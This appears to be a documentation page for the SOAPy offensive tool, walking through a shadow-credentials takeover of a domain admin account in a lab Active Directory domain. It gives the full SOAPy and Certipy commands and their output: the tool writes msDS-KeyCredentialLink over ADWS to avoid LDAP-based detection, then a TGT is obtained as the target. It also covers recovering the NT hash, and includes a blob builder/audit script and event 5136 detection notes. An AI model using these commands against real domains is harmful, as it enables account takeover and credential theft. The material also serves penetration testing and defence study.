Post‐Exploitation
SOAPy can write the msDS-KeyCredentialLink attribute over ADWS to take over an account (the shadow credentials technique) when the authenticated principal holds a write permission over the target object, such as GenericAll, GenericWrite, or WriteProperty on msDS-KeyCredentialLink itself.
Writing the attribute over ADWS rather than LDAP can have opsec benefits against detections that only inspect LDAP modify traffic: the ADWS service on the domain controller performs the directory write on the client's behalf, so no modify request is ever seen on port 389/636. The change is still an ordinary directory write on the DC, so object-level auditing (Directory Service Changes, event ID 5136, when a SACL covers the attribute) records it regardless of which protocol the client used.
A shadow credentials attack over ADWS can be performed with SOAPy using the following command:
┌──(kali㉿LG-kali)-[~/SOAPy]
└─$ SOAPy ludus.domain/domainuser:'password'@dc01.ludus.domain --shadow-creds add --shadow-target domainadmin
____ ___ _ ____
/ ___| / _ \ / \ | _ \ _ _
\___ \| | | |/ _ \ | |_) | | | |
___) | |_| / ___ \| __/| |_| |
|____/ \___/_/ \_\_| \__, |
|___/
v1.0.0
@_logangoins
github.com/jlevere
[*] Searching for target account: domainadmin
[*] Connecting to dc01.ludus.domain for resource:Enumeration
[*] Using query: (sAMAccountName=domainadmin)
[*] Using distingushedName: DC=ludus,DC=domain
[+] Target found: CN=domainadmin,CN=Users,DC=ludus,DC=domain
[*] Generating certificate...
[+] Certificate generated
[*] Generating KeyCredential...
[+] KeyCredential generated with DeviceID: bd2b1445-b51a-7c0a-b0cd-3ff5f140ccb4
[*] Connecting to dc01.ludus.domain for resource:Enumeration
[*] Using query: (distinguishedName=CN=domainadmin,CN=Users,DC=ludus,DC=domain)
[*] Using distingushedName: CN=domainadmin,CN=Users,DC=ludus,DC=domain
[*] Updating msDS-KeyCredentialLink attribute...
[*] Connecting to dc01.ludus.domain for resource:Resource
[+] Successfully updated msDS-KeyCredentialLink
[*] No filename provided, using: 2lb6oaZo
[*] No password provided, using: mIcCUy7Bwik9ou0Zutp0
[+] Saved PFX certificate: 2lb6oaZo.pfx
[+] PFX password: mIcCUy7Bwik9ou0Zutp0
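To make concrete what the "Generating KeyCredential" step above produces and what the ADWS write actually lands in the directory, here is an added example (not SOAPy's code) that builds a version-2 KEYCREDENTIALLINK_BLOB as laid out in MS-ADTS 2.2.20, wraps it in the DN-Binary form msDS-KeyCredentialLink uses, and parses it back to verify the embedded KeyID and KeyHash. The key material is a constructed placeholder rather than a real RSA public key (a real entry carries the public key matching the PFX the tool saves), the DeviceID and DN are taken from the run above, and the parse/audit side is the check a defender would run over an account's attribute values to list which devices hold credentials on it.

```python
"""msDS-KeyCredentialLink helper: build, encode and audit KEYCREDENTIALLINK_BLOB values.
Added example, not SOAPy's code; key material below is a constructed placeholder."""
import hashlib
import struct
import uuid
from datetime import datetime, timezone

VERSION_2 = 0x00000200
# KEYCREDENTIALLINK_ENTRY identifiers (MS-ADTS 2.2.20.2).
KEY_ID, KEY_HASH, KEY_MATERIAL, KEY_USAGE, KEY_SOURCE = 1, 2, 3, 4, 5
DEVICE_ID, CUSTOM_KEY_INFO, LAST_LOGON_TIME, CREATION_TIME = 6, 7, 8, 9
KEY_USAGE_NGC, KEY_SOURCE_AD = 0x01, 0x00
EPOCH_AS_FILETIME = 116444736000000000  # 1601-01-01 -> 1970-01-01 in 100 ns ticks


def to_filetime(dt):
    return int(dt.timestamp()) * 10_000_000 + EPOCH_AS_FILETIME


def from_filetime(ft):
    return datetime.fromtimestamp((ft - EPOCH_AS_FILETIME) / 10_000_000, tz=timezone.utc)


def _entry(identifier, value):
    # Each entry is a little-endian uint16 length, a one-byte identifier, then the value.
    return struct.pack("<HB", len(value), identifier) + value


def build_key_credential(key_material, device_id, created):
    """Version-2 blob for an NGC key sourced from AD, entries in the order Windows writes them."""
    tail = (_entry(KEY_MATERIAL, key_material)
            + _entry(KEY_USAGE, bytes([KEY_USAGE_NGC]))
            + _entry(KEY_SOURCE, bytes([KEY_SOURCE_AD]))
            + _entry(DEVICE_ID, device_id.bytes_le)           # GUID in Windows byte order
            + _entry(CUSTOM_KEY_INFO, bytes([0x01, 0x00]))    # version 1, no flags
            + _entry(LAST_LOGON_TIME, struct.pack("<Q", to_filetime(created)))
            + _entry(CREATION_TIME, struct.pack("<Q", to_filetime(created))))
    key_id = hashlib.sha256(key_material).digest()   # v2: KeyID is SHA-256 of KeyMaterial
    key_hash = hashlib.sha256(tail).digest()         # KeyHash covers every entry after it
    return struct.pack("<I", VERSION_2) + _entry(KEY_ID, key_id) + _entry(KEY_HASH, key_hash) + tail


def parse_key_credential(blob):
    """Return (version, [(identifier, value, end_offset), ...]); rejects truncated data."""
    if len(blob) < 4:
        raise ValueError("blob shorter than the version field")
    (version,) = struct.unpack_from("<I", blob, 0)
    entries, off = [], 4
    while off < len(blob):
        if off + 3 > len(blob):
            raise ValueError("truncated entry header")
        length, ident = struct.unpack_from("<HB", blob, off)
        value = blob[off + 3:off + 3 + length]
        if len(value) != length:
            raise ValueError("truncated entry value")
        off += 3 + length
        entries.append((ident, value, off))
    return version, entries


def summarize_key_credential(blob):
    """Decode the fields a reviewer cares about and verify the blob's own hashes."""
    version, entries = parse_key_credential(blob)
    f = {ident: value for ident, value, _ in entries}
    hash_ok = any(hashlib.sha256(blob[end:]).digest() == value
                  for ident, value, end in entries if ident == KEY_HASH)
    return {
        "version": version,
        "device_id": str(uuid.UUID(bytes_le=f[DEVICE_ID])) if DEVICE_ID in f else None,
        "key_usage": f[KEY_USAGE][0] if KEY_USAGE in f else None,
        "key_source": f[KEY_SOURCE][0] if KEY_SOURCE in f else None,
        "created": from_filetime(struct.unpack("<Q", f[CREATION_TIME])[0]) if CREATION_TIME in f else None,
        "key_id": f.get(KEY_ID, b"").hex(),
        "key_hash_ok": hash_ok,
        "key_id_ok": f.get(KEY_ID) == hashlib.sha256(f.get(KEY_MATERIAL, b"")).digest(),
    }


def to_dn_binary(blob, owner_dn):
    # AD stores the attribute as DN-Binary: B:<hex digit count>:<hex>:<owner DN>.
    hex_data = blob.hex().upper()
    return f"B:{len(hex_data)}:{hex_data}:{owner_dn}"


def from_dn_binary(value):
    prefix, hex_len, hex_data, dn = value.split(":", 3)
    if prefix != "B" or int(hex_len) != len(hex_data):
        raise ValueError("malformed DN-Binary value")
    return bytes.fromhex(hex_data), dn


def audit_key_credential_link(values):
    """Summarize every value of the multi-valued attribute as returned by a directory query."""
    report = []
    for v in values:
        blob, dn = from_dn_binary(v)
        summary = summarize_key_credential(blob)
        summary["owner_dn"] = dn
        report.append(summary)
    return report


def demo():
    """Constructed data: one well-formed value and one whose KeyMaterial was altered in place."""
    key_material = b"CONSTRUCTED-PLACEHOLDER-NOT-A-REAL-RSA-PUBLIC-KEY"
    device_id = uuid.UUID("bd2b1445-b51a-7c0a-b0cd-3ff5f140ccb4")  # DeviceID from the run above
    owner_dn = "CN=domainadmin,CN=Users,DC=ludus,DC=domain"
    blob = build_key_credential(key_material, device_id, datetime(2024, 1, 1, tzinfo=timezone.utc))
    i = blob.index(key_material) + 3
    tampered = blob[:i] + bytes([blob[i] ^ 0xFF]) + blob[i + 1:]
    return audit_key_credential_link([to_dn_binary(blob, owner_dn), to_dn_binary(tampered, owner_dn)])


if __name__ == "__main__":
    for entry in demo():
        print(entry)
```

Running the file prints two summaries: the well-formed value verifies, while the copy with one byte of KeyMaterial altered fails both the KeyID and KeyHash checks, which is what makes the parser safe to point at values of unknown origin. On the defensive side, an entry whose DeviceID does not correspond to a known device registration, or whose creation time coincides with a write by an unexpected principal, is the on-disk artifact of this technique whichever protocol was used to write it.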
Once msDS-KeyCredentialLink has been written, the saved PFX and its password can be used for PKINIT (certificate-based Kerberos pre-authentication), which yields a TGT as the target user and so allows impersonation. The generated certificate carries no SAN identity, which is why Certipy reports that it found none and the target must be supplied explicitly with -username and -domain. PKINIT also requires that the domain controller itself holds a certificate valid for Kerberos authentication (for example one issued from an AD CS Domain Controller or Kerberos Authentication template); without it the KDC rejects the request with KDC_ERR_PADATA_TYPE_NOSUPP.
┌──(kali㉿LG-kali)-[~/SOAPy]
└─$ certipy auth -pfx 2lb6oaZo.pfx -password mIcCUy7Bwik9ou0Zutp0 -dc-ip 10.2.10.10 -no-hash -domain ludus.domain -username domainadmin
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] No identities found in this certificate
[!] Could not find identity in the provided certificate
[*] Using principal: 'domainadmin@ludus.domain'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'domainadmin.ccache'
[*] Wrote credential cache to 'domainadmin.ccache'
The resulting domainadmin.ccache can then be used with Kerberos-aware tooling (for example by exporting KRB5CCNAME to point at it) to authenticate to resources across the network as the impersonated account. Because -no-hash was passed, Certipy skipped the UnPAC-the-hash step; running certipy auth without that flag additionally recovers the account's NT hash from the PAC.